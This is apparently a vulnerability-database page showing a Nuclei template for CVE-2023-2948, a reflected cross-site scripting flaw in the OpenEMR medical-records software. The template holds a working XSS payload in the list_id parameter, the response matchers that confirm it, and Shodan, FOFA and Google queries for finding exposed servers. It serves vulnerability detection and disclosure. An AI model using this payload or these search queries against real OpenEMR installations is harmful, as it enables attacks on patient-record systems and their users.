CVE-2023-2948: OpenEMR < 7.0.1 - Cross-Site Scripting

2025-08-01 OpenEMR PoC Public

Description

Cross-site Scripting (XSS) - Reflected in GitHub repository openemr/openemr prior to 7.0.1.

PoC

id: CVE-2023-2948

info:
  name: OpenEMR < 7.0.1 - Cross-Site Scripting
  author: ritikchaddha,princechaddha
  severity: medium
  description: |
    Cross-site Scripting (XSS) - Reflected in GitHub repository openemr/openemr prior to 7.0.1.
  impact: |
    Unauthenticated attackers can inject malicious JavaScript through the list_id parameter, potentially stealing user credentials or executing unauthorized actions in the context of other users.
  remediation: |
    Upgrade to OpenEMR version 7.0.1 or later.
  reference:
    - https://huntr.com/bounties/3842486f-38b1-4150-9f78-b81d0ae580c4
    - https://github.com/openemr/openemr/commit/af1ecf78d1342519791bda9d3079e88f7d859015
    - https://nvd.nist.gov/vuln/detail/CVE-2023-2948
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
    cvss-score: 6.1
    cve-id: CVE-2023-2948
    cwe-id: CWE-79
    epss-score: 0.96731
    epss-percentile: 0.99884
    cpe: cpe:2.3:a:open-emr:openemr:*:*:*:*:*:*:*:*
  metadata:
    verified: true
    max-request: 1
    vendor: open-emr
    product: openemr
    shodan-query:
      - http.favicon.hash:1971268439
      - http.html:"openemr"
      - http.title:"openemr"
    fofa-query:
      - app="OpenEMR"
      - body="openemr"
      - title="openemr"
      - app="openemr"
      - icon_hash=1971268439
    google-query: intitle:"openemr"
  tags: cve,cve2023,xss,openemr,open-emr,vuln

http:
  - method: GET
    path:
      - "{{BaseURL}}/library/custom_template/share_template.php?list_id=1}});}}alert(document.domain);function%20x(){if(1){a=({a:{a:1"

    matchers:
      - type: dsl
        dsl:
          - 'status_code == 200'
          - 'contains(header, "text/html")'
          - 'contains_all(body, "list_id: 1}});}}alert(document.domain);", "select at least one Provider", "Save</span>")'
        condition: and
# digest: 4b0a00483046022100c7b3715c4c6d57fa1ec1adc532abddf7c5f72859b24618c0982c1ca064235ac702210094fb5f04c487ad38938bcf1a6f2dd407b0bf5377fa0064d1023367130014b073:922c64590222798bb761d5b6d8e72950

# Visit https://trap.biu.life/ to view exploit trends for this vulnerability.

References

Related Vulnerabilities